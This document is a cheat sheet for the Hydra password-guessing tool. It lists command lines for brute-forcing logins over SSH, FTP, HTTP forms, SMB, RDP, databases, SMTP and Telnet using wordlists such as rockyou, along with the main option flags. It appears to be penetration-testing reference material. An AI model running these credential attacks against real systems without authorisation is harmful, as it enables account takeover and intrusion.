Hydra Cheat Sheet

Basic Syntax

hydra -l user -p pass protocol://target
hydra -L users.txt -P passwords.txt protocol://target

# -l  single username
# -L  username wordlist
# -p  single password
# -P  password wordlist
# -t  threads (default 16)
# -vV verbose, show each attempt
# -f  stop on first valid credential
# -o  output to file

Protocols

SSH

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
hydra -l root -P passwords.txt ssh://192.168.1.1 -t 4
hydra -l root -P passwords.txt 192.168.1.1 ssh -t 4

FTP

hydra -l admin -P passwords.txt ftp://192.168.1.1
hydra -L users.txt -P passwords.txt ftp://192.168.1.1 -t 10

HTTP Basic Auth

hydra -l admin -P passwords.txt http-get://192.168.1.1/admin
hydra -l admin -P passwords.txt https-get://192.168.1.1/admin

HTTP POST Form

# Syntax: "path:POST_params:failure_string"
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

# With cookie
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:error:H=Cookie: session=abc123"

SMB

hydra -l Administrator -P passwords.txt smb://192.168.1.1
hydra -L users.txt -P passwords.txt 192.168.1.0/24 smb

RDP

hydra -l Administrator -P passwords.txt rdp://192.168.1.1

MySQL

hydra -l root -P passwords.txt mysql://192.168.1.1

PostgreSQL

hydra -l postgres -P passwords.txt postgres://192.168.1.1

SMTP

hydra -l [email protected] -P passwords.txt smtp://mail.domain.com
hydra -l user -P passwords.txt smtp://192.168.1.1:587

Telnet

hydra -l admin -P passwords.txt telnet://192.168.1.1

Useful Options

Flag            Description
-t 4            4 threads (use lower for SSH)
-f              Stop after first success
-vV             Show every attempt
-o result.txt   Save found credentials
-e nsr          Try null password, login as password, reversed login as password
-s 2222         Custom port
-R              Restore interrupted session
-I              Ignore existing restore file
-x 3:5:a        Generate passwords (min:max:charset)

Common Wordlists

/usr/share/wordlists/rockyou.txt         # Large, classic
/usr/share/wordlists/dirb/common.txt     # Short/common
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
/usr/share/seclists/Usernames/Names/names.txt